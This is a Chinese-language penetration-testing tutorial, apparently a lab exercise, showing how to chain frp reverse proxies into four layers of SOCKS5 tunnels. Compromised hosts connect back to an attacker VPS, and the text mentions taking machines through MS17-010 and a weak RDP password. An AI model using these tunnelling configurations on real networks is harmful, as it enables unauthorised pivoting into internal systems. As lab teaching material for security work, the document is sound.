Frp搭建多層內網通信隧道

0x01 什么是frp

frp 是一個專注于內網穿透的高性能的反向代理應用，支持 TCP、UDP、HTTP、HTTPS 等多種協議。可以將內網服務以安全、便捷的方式通過具有公網 IP 節點的中轉暴露到公網。frp項目官網地址是：https://github.com/fatedier/frp/，下載解壓后可以發現7個文件，frpc和frps分別為客戶端和服務端可執行程序，frpc.ini和frps.ini，分別為客戶端和服務端配置文件，frpc_full.ini和frps_full.ini分別為客戶端所有配置項和服務端所有配置項。

0x02 配置文件

2. 配置文件部分參數說明(更多參數說明，請參考官方文檔)

frps：
[common]
bind_addr = 0.0.0.0  # 服務端監聽地址
bind_port = 7000 # 服務端監聽端口，默認7000
auth_token = xxxxxxxx # 驗證憑據
frpc：
[common]
server_addr = x.x.x.x # 連接的服務器IP地址
server_port = 7000 # 連接的服務器端口
[http_proxy]
type = tcp # 連接類型為tcp
local_ip = x.x.x.x # 本地ip
local_port = 8888 # 本地監聽端口
remote_port = 8888 # 遠程服務器端口
use_encryption = true #啟?加密
plugin = socks5  # 使?插件socks5代理

0x03 環境配置

實驗環境

攻擊機：
Vps：192.168.53.132
win10：192.168.53.129
受害機：
Debian：192.168.53.134  10.10.20.131
win7：10.10.20.129   10.10.30.130
win10：10.10.30.132  172.16.5.132
2008：172.16.5.129   172.16.10.128

0x04 步驟

4.1 第一層隧道

假如我們在拿到Debian主機權限后，發現其存在第二張網卡為10.10.20.0/24網段的，但是攻擊機沒辦法直接訪問這個網段。

kali攻擊機啟動frps監聽，配置文件如下：
[common]
bind_addr = 0.0.0.0
bind_port = 7000
Debian啟動frpc，配置文件如下：
[common]
server_addr = 192.168.53.132  
server_port = 7000          
[http_proxy]
type = tcp
local_ip = 10.10.20.131
remote_port = 8888  
local_port = 8888
plugin = socks5

vps:

debian:

win10：

此時我們便可以通過隧道去掃描10.10.20.0/24這個網段下的主機。

4.2 第二層隧道

假如我們通過3389弱口令拿到10.10.20.129這臺主機，但是經過查看后發現它還有第二個網段10.10.30.0/24，但是目前我們的隧道只能訪問到10.10.20.0/24這個網段，遂需要搭建第二層通信隧道，這個時候Debian既是客戶端，也是服務端。

Debian(frpc)：
[common]
server_addr = 192.168.53.132  
server_port = 7000          
[http_proxy]
type = tcp
remote_port = 8888
local_ip = 10.10.20.131  
local_port = 8888      
plugin = socks5
Debian(frps):
[common]
bind_addr = 10.10.20.131
bind_port = 7000
Win 7(frpc):
[common]
server_addr = 10.10.20.131  
server_port = 7000          
[http_proxy]
type = tcp
local_ip = 10.10.30.130
remote_port = 8888    
local_port = 8888
plugin = socks5

debian：

Win7：

win10：

通過fscan掃描發現10.10.30.132這臺主機存在MS17-010，且通過17-010拿下這臺主機權限。

4.3 第三層隧道

現在我們又控制了PC這臺主機，查看信息后，又發現了存在172.16.5.0/24這個網段，但是以目前條件kali攻擊機沒辦法訪問到這個網段下的資源，所以還要搭建第三層隧道，那么這個時候，Win7又多了一個身份，他既是客戶端也是服務端。

kali和Debian配置不需要改動，Win7的frpc和frps配置參考上一條Debian配置，這邊就不再次體現了，然后Win10的frpc配置參考上面的Win7的frpc配置

Win7：

PC:

Win10:

通過fscan又發現存在一臺ms17-010的機器，172.16.5.129，且通過17-010拿下這臺機器。

通過隧道成功登錄到2008這臺機器。

4.3 第四層隧道

拿到172.16.5.129這臺機器后，發現他又存在172.16.10.0/24這個網段，遂搭建第四層隧道，配置文件都差不多，自行修改。

PC:

2008：

Win10:

通過fscan又發現存在一臺ms17-010的機器，172.16.10.132，且通過17-010拿下這臺機器。

至此，所有主機全部都能登錄。